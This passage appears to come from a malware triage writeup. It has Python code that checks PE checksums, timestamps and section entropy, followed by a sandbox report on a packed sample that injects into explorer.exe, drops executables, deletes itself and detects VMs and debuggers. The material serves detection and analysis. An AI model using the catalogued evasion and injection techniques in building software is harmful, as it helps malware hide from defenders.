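IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE = 0x00000020, 0x20000000
IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x40000000, 0x80000000

def pe_offset(data: bytes) -> int:
    """File offset of the PE signature (e_lfanew), after checking both magics."""
    off = struct.unpack_from("<I", data, 0x3C)[0] if data[:2] == b"MZ" else -1
    if off < 0 or data[off:off + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    return off

def stored_timestamp(data: bytes) -> int:
    return struct.unpack_from("<I", data, pe_offset(data) + 8)[0]             # COFF TimeDateStamp

def stored_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, pe_offset(data) + 4 + 20 + 64)[0]   # OptionalHeader.CheckSum

def pe_checksum(data: bytes) -> int:
    """CheckSumMappedFile algorithm: fold every 32-bit word except the CheckSum
    field itself into 16 bits with end-around carry, then add the file size."""
    skip = pe_offset(data) + 4 + 20 + 64
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for i in range(0, len(padded), 4):
        if i == skip:
            continue
        total += struct.unpack_from("<I", padded, i)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)

def timestamp_to_utc(ts: int) -> datetime:
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=ts)

def timestamp_is_suspicious(ts: int, now: datetime = None) -> bool:
    """A zero or future link time is a common packer/obfuscator tell."""
    return ts == 0 or timestamp_to_utc(ts) > (now or datetime.now(timezone.utc))

def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniform (compressed or encrypted) data."""
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0

def section_rights(chars: int) -> str:
    """Characteristics in the report's notation ('ER', 'EW', 'W', ...)."""
    flags = ((IMAGE_SCN_MEM_EXECUTE, "E"), (IMAGE_SCN_MEM_READ, "R"), (IMAGE_SCN_MEM_WRITE, "W"))
    return "".join(letter for flag, letter in flags if chars & flag)

def sections(data: bytes):
    """Yield (name, characteristics, raw bytes) for every section header."""
    off = pe_offset(data)
    count = struct.unpack_from("<H", data, off + 6)[0]
    table = off + 4 + 20 + struct.unpack_from("<H", data, off + 20)[0]   # right after the optional header
    for i in range(count):
        hdr = data[table + 40 * i: table + 40 * i + 40]
        raw_size, raw_ptr = struct.unpack_from("<II", hdr, 16)
        name = hdr[:8].rstrip(b"\0").decode("ascii", "replace")
        yield name, struct.unpack_from("<I", hdr, 36)[0], data[raw_ptr: raw_ptr + raw_size]

def triage(data: bytes, now: datetime = None) -> dict:
    """The static findings a sandbox prints for one file, as a dict."""
    result = {"checksum_ok": stored_checksum(data) == pe_checksum(data),
              "timestamp_suspicious": timestamp_is_suspicious(stored_timestamp(data), now),
              "sections": {}}
    for name, chars, raw in sections(data):
        ent = shannon_entropy(raw)
        # Writable code on disk, or code with entropy above ~7, usually means a packer stub.
        packed = bool(chars & IMAGE_SCN_CNT_CODE and chars & IMAGE_SCN_MEM_WRITE) or ent > 7.0
        result["sections"][name] = {"rights": section_rights(chars), "entropy": round(ent, 2),
                                    "packed_hint": packed}
    return result

def build_sample_pe(timestamp: int, checksum: int, text_chars: int, text: bytes) -> bytes:
    """Constructed minimal PE32 with a single .text section, for the demo only."""
    e_lfanew, opt_size = 0x40, 224
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 64, checksum)
    raw_ptr = e_lfanew + 4 + 20 + opt_size + 40                  # one section header, then its data
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000, len(text), raw_ptr, 0, 0, 0, 0, text_chars)
    return dos + b"PE\0\0" + coff + bytes(opt) + sec + text

if __name__ == "__main__":
    packed_chars = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    print(triage(build_sample_pe(0xA6AE113F, 0, packed_chars, bytes(range(256)) * 4)))
```

A stored checksum of 0, as in DB56.exe.5.dr, is not an error in the file format (the loader only enforces the field for drivers and a few system images) but it means the linker's post-processing step was skipped or the binary was rewritten afterwards, which is why it is listed next to the impossible 2058 timestamp and the 7+ entropy: none of the three is decisive alone, together they are a strong packer indicator.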
Source: DB56.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: DB56.exe.5.dr, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: DB56.exe.5.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 17.2.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 17.2.DB56.exe.aa0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 17.0.DB56.exe.aa0000.2.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: 17.0.DB56.exe.aa0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 17.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 17.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 17.0.DB56.exe.aa0000.3.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: 17.0.DB56.exe.aa0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 17.0.DB56.exe.aa0000.0.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: 17.0.DB56.exe.aa0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 17.0.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 17.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 17.0.DB56.exe.aa0000.1.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: 17.0.DB56.exe.aa0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 18.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 18.0.DB56.exe.aa0000.1.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: 18.0.DB56.exe.aa0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 18.0.DB56.exe.aa0000.13.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 18.0.DB56.exe.aa0000.13.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: 18.0.DB56.exe.aa0000.13.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 18.0.DB56.exe.aa0000.3.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: 18.0.DB56.exe.aa0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 18.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 18.2.DB56.exe.aa0000.1.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: 18.2.DB56.exe.aa0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 18.2.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 18.0.DB56.exe.aa0000.2.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: 18.0.DB56.exe.aa0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 18.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'

Persistence and Installation Behavior:

Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\acgvitw
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8CE5.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\acgvitw
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\DB56.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\4924.exe
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe File created: C:\Users\user\AppData\Local\Temp\nsn7A92.tmp\System.dll

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 7769
Source: unknown Network traffic detected: HTTP traffic on port 7769 -> 49850
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\fw8ex1bnek.exe
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\acgvitw:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: fw8ex1BNek.exe, 00000000.00000002.427730534.0000000000827000.00000004.00000001.sdmp Binary or memory string: ASWHOOK
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\acgvitw Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\DB56.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6588 Thread sleep count: 565 > 30
Source: C:\Windows\explorer.exe TID: 6592 Thread sleep count: 233 > 30
Source: C:\Windows\explorer.exe TID: 6612 Thread sleep count: 370 > 30
Source: C:\Windows\explorer.exe TID: 6612 Thread sleep time: -37000s >= -30000s
Source: C:\Windows\explorer.exe TID: 6700 Thread sleep count: 423 > 30
Source: C:\Windows\explorer.exe TID: 6776 Thread sleep count: 131 > 30
Source: C:\Windows\explorer.exe TID: 6688 Thread sleep count: 237 > 30
Source: C:\Users\user\AppData\Local\Temp\DB56.exe TID: 4752 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 565
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 370
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 423
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052FA538 rdtsc 17_2_052FA538
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000005.00000000.414901290.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.414837754.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: DB56.exe, 00000012.00000002.621782230.0000000000FF8000.00000004.00000020.sdmp Binary or memory string: VMware
Source: explorer.exe, 00000005.00000000.409676978.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.414837754.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.373755525.000000000461E000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mict
Source: explorer.exe, 00000005.00000000.395650395.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: DB56.exe, 00000012.00000002.621782230.0000000000FF8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: DB56.exe, 00000012.00000002.621782230.0000000000FF8000.00000004.00000020.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMware2DTXZL_YWin32_VideoControllerNA9BZMXCVideoController120060621000000.000000-00048390441display.infMSBDA_EF1P2_2PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors5MV_TKNV
Source: explorer.exe, 00000005.00000000.395650395.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.414901290.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000005.00000000.389556354.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\fw8ex1BNek.exe System information queried: ModuleInformation

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\fw8ex1BNek.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\acgvitw System information queried: CodeIntegrityInformation
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_73781BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 24_2_73781BFF
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_0081A84E push dword ptr fs:[00000030h] 0_2_0081A84E
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_007EA33E push dword ptr fs:[00000030h] 11_2_007EA33E
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02869B92 mov eax, dword ptr fs:[00000030h] 24_2_02869B92
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02868F69 mov eax, dword ptr fs:[00000030h] 24_2_02868F69
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_028671B0 mov eax, dword ptr fs:[00000030h] 24_2_028671B0
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_028689C9 mov eax, dword ptr fs:[00000030h] 24_2_028689C9
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\acgvitw Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052FA538 rdtsc 17_2_052FA538
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\4924.exe Process token adjusted: Debug
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_023E0490 LdrInitializeThunk, 23_2_023E0490
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_0286A914 RtlAddVectoredExceptionHandler, 24_2_0286A914

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe Domain query: www.bastinscustomfab.com
Source: C:\Windows\explorer.exe Domain query: rcacademy.at
Source: C:\Windows\explorer.exe Domain query: bastinscustomfab.com
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 4924.exe.5.dr
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\acgvitw Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\acgvitw Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Memory written: C:\Users\user\AppData\Local\Temp\DB56.exe base: 400000 value starts with: 4D5A
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Thread created: C:\Windows\explorer.exe EIP: 2E519C8
Source: C:\Users\user\AppData\Roaming\acgvitw Thread created: unknown EIP: 4BB19C8
.NET source code references suspicious native API functions
Source: DB56.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: DB56.exe.5.dr, redaeHegasseMledoMecivreSmetsyS1587.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 17.2.DB56.exe.aa0000.0.unpack, redaeHegasseMledoMecivreSmetsyS1587.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 17.2.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 17.0.DB56.exe.aa0000.2.unpack, redaeHegasseMledoMecivreSmetsyS1587.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 17.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 17.0.DB56.exe.aa0000.3.unpack, redaeHegasseMledoMecivreSmetsyS1587.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
